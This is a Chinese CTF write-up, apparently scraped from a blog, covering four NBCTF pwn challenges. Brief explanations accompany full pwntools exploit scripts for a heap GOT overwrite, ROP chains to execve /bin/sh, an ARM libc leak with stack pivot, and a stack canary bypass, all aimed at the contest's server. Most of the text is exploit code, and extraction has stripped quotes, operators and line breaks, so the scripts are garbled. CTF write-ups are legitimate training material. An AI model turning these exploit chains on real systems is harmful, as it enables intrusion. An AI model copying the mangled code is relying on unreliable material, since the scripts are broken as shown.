为企业做网站还有前途吗,德阳市做网站,wordpress 博客编辑器,wordpress 支付 小程序day2打了一个叫NBCTF的比赛
做了四个题#xff0c;剩下五道arm的题不会做了#xff0c;关注一下wp#xff0c;也许可以靠这个比赛提升一波异架构能力。
heapnotes
2.31简单堆题#xff0c;没啥好说的#xff0c;直接改got就行了
from re import L
from pwn import *
f…day2打了一个叫NBCTF的比赛
做了四个题剩下五道arm的题不会做了关注一下wp也许可以靠这个比赛提升一波异架构能力。
heapnotes
2.31简单堆题没啥好说的直接改got就行了
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level debug
context.archamd64
#ioprocess(./pwn)
#io remote(tamuctf.com, 443, sslTrue, sniencryptinator)
ioremote(chal.nbctf.com,30172)
#io process([./pwn],env{LD_PRELOAD:./libc64.so})
elfELF(./pwn)
#io remote(arm.nc.jctf.pro, 17916)
#ioprocess([qemu-ppc, -g, 4321, ./pwn])
#ioprocess([qemu-aarch64, -L, /usr/aarch64-linux-gnu, ./pwn])
#print(please start gdb)
#sraw_input()
libc ELF(./libc.so.6)
#libc ELF(./libc-2.31.so)
rl lambda aFalse : io.recvline(a)
ru lambda a,bTrue : io.recvuntil(a,b)
rn lambda x : io.recvn(x)
sn lambda x : io.send(x)
sl lambda x : io.sendline(x)
sa lambda a,b : io.sendafter(a,b)
sla lambda a,b : io.sendlineafter(a,b)
irt lambda : io.interactive()
dbg lambda textNone : gdb.attach(io, text)
# lg lambda s,addr : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s,addr))
lg lambda s : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s, eval(s)))
uu32 lambda data : u32(data.ljust(4, b\x00))
uu64 lambda data : u64(data.ljust(8, b\x00))
def menu(choice):sla( ,str(choice))
def add(context):menu(1)sla(Input note data: ,context)
def show(index):menu(2)sla(): ,str(index))
def edit(index,context):menu(3)sla(): ,str(index))sla(Input note data: ,context)
def free(index):menu(4)sla(): ,str(index))bss0x404120
add(/bin/sh\x00)
add(a*8)
add(/bin/sh\x00)
free(0)
free(1)
show(1)
heapbaseu64(io.recvline()[:-1].ljust(8,\x00))-0x2a0
lg(heapbase)
edit(1,a*0x10)
free(1)
add(p64(0x404020))
add(a*8)
add(p64(elf.plt[system]))
show(2)
#gdb.attach(io)
irt()ribbit
直接写rop硬拿shell就好不用管它什么所谓的win函数反正程序是静态编译的什么gadget都有
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level debug
context.archamd64
#ioprocess(./pwn)
#iogdb.debug(./pwn,b*0x401922)
ioremote(chal.nbctf.com,30170)
#io remote(tamuctf.com, 443, sslTrue, sniencryptinator)
#ioremote(chal.nbctf.com,30172)
#io process([./pwn],env{LD_PRELOAD:./libc64.so})
elfELF(./pwn)
#io remote(arm.nc.jctf.pro, 17916)
#ioprocess([qemu-ppc, -g, 4321, ./pwn])
#ioprocess([qemu-aarch64, -L, /usr/aarch64-linux-gnu, ./pwn])
#print(please start gdb)
#sraw_input()
#libc ELF(./libc.so.6)
#libc ELF(./libc-2.31.so)
rl lambda aFalse : io.recvline(a)
ru lambda a,bTrue : io.recvuntil(a,b)
rn lambda x : io.recvn(x)
sn lambda x : io.send(x)
sl lambda x : io.sendline(x)
sa lambda a,b : io.sendafter(a,b)
sla lambda a,b : io.sendlineafter(a,b)
irt lambda : io.interactive()
dbg lambda textNone : gdb.attach(io, text)
# lg lambda s,addr : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s,addr))
lg lambda s : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s, eval(s)))
uu32 lambda data : u32(data.ljust(4, b\x00))
uu64 lambda data : u64(data.ljust(8, b\x00))
rdi_ret0x000000000040201f
rsi_ret0x000000000040a04e
rdx_ret0x000000000047fe1a
rax_ret0x0000000000449267
win0x401825
puts0x40c7b0
t_read0x448800
bss0x4C6800
syscall0x0000000000401dd4payloada*0x28p64(rdi_ret)p64(0)p64(rsi_ret)p64(bss)p64(rdx_ret)p64(8)p64(t_read)p64(rdi_ret)p64(bss)p64(rsi_ret)p64(0)p64(rdx_ret)p64(0)p64(rax_ret)p64(59)p64(syscall)
#payloadYou got this!\x00*8Just do it!\x00*8p64(rdi_ret)p64(0xF10C70B33F)p64(rax_ret)p64(rsi_ret)p64(win)
sla(Can you give my pet frog some motivation to jump out the hole?,payload)
io.send(/bin/sh\x00)
irt()ret2thumb
用自己的qemu-arm就可以直接怼shellcode用它给的就不行有点奇怪而且每天东这个题和thumb有什么关系直接泄露libc然后栈迁移到bss上直接rop就行不过要事先找到能控制r0的gadget直接ROPgadget搜只能搜到控制fp,r3和r4的gadget但是仔细找的话会发现如果把0x10500地址处的mov r0,r3;pop {fp,pc} 和pop {r3,pc}结合起来的话是可以做到直接控制r0的这也是为什么可以直接泄露libc去进行rop的原因
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level debug
context.archarm#ioprocess(./pwn)
#io remote(tamuctf.com, 443, sslTrue, sniencryptinator)
ioremote(chal.nbctf.com,30175)
#io process([./pwn],env{LD_PRELOAD:./libc64.so})
elfELF(./pwn)
#io remote(arm.nc.jctf.pro, 17916)
#ioprocess([qemu-ppc, -g, 4321, ./pwn])
#ioprocess([./qemu-arm, -g,4321,-L, ., ./pwn])
#ioprocess([./qemu-arm, -L, ., ./pwn])
#print(please start gdb)
sraw_input()
libc ELF(./libc.so.6)
#libc ELF(./libc-2.31.so)
rl lambda aFalse : io.recvline(a)
ru lambda a,bTrue : io.recvuntil(a,b)
rn lambda x : io.recvn(x)
sn lambda x : io.send(x)
sl lambda x : io.sendline(x)
sa lambda a,b : io.sendafter(a,b)
sla lambda a,b : io.sendlineafter(a,b)
irt lambda : io.interactive()
dbg lambda textNone : gdb.attach(io, text)
# lg lambda s,addr : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s,addr))
lg lambda s : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s, eval(s)))
uu32 lambda data : u32(data.ljust(4, b\x00))
uu64 lambda data : u64(data.ljust(8, b\x00))
main0x10510
bss0x12600
gadget0x104F0
r3_pc0x00010388
r0_r30x10550
payloada*0x20p32(bss)p32(r3_pc)p32(elf.got[puts])p32(r0_r3)p32(bss0x24)p32(gadget)p32(0)p32(bss)
sla(Can you ret2thumb? \n,payload)
libcbaseu64(io.recvline()[:-1].ljust(8,\x00))-libc.sym[puts]
lg(libcbase)
#shellcodeasm(shellcraft.thumb.sh())
systemlibcbaselibc.sym[system]
payloada*0x24p32(r3_pc)p32(bss0x38)p32(r0_r3)p32(bss)p32(system)/bin/sh\x00
io.sendline(payload)
irt()canary-in-a-coal-mine
程序给了gets还给了在栈上写某条从已知地址出发的链上的任意一个数据有canary给了后门所以直接用大量后门地址覆盖栈然后利用给的功能在bss找一个能指向canary的地址写到对应位置上绕过canary保护就可
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
context.log_level debug
context.archarm#ioprocess(./pwn)
#io remote(tamuctf.com, 443, sslTrue, sniencryptinator)
ioremote(chal.nbctf.com,30178)
#io process([./pwn],env{LD_PRELOAD:./libc64.so})
elfELF(./pwn)
#io remote(arm.nc.jctf.pro, 17916)
#ioprocess([qemu-ppc, -g, 4321, ./pwn])
#ioprocess([./qemu-arm, -g,4321,-L, ., ./pwn])
#ioprocess([./qemu-arm, -L, ., ./pwn])
#print(please start gdb)
sraw_input()
libc ELF(./libc.so.6)
#libc ELF(./libc-2.31.so)
rl lambda aFalse : io.recvline(a)
ru lambda a,bTrue : io.recvuntil(a,b)
rn lambda x : io.recvn(x)
sn lambda x : io.send(x)
sl lambda x : io.sendline(x)
sa lambda a,b : io.sendafter(a,b)
sla lambda a,b : io.sendlineafter(a,b)
irt lambda : io.interactive()
dbg lambda textNone : gdb.attach(io, text)
# lg lambda s,addr : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s,addr))
lg lambda s : log.info(\033[1;31;40m %s -- 0x%x \033[0m % (s, eval(s)))
uu32 lambda data : u32(data.ljust(4, b\x00))
uu64 lambda data : u64(data.ljust(8, b\x00))
win0x10828
def menu(choice):sla( ,str(choice))
def mine(index,depth):menu(1)sla(mining position\n ,str(index))sla(mining depth\n ,str(depth))
def extract(index):menu(2)sla(minecart number\n ,str(index))
def gets(payload):menu(3)sla(collapsing mineshaft\n ,payload)
payloadp32(win1)*0x20
gets(payload)
guard0x21038
mine(0x21038,2)
extract(8)
menu(4)
irt()
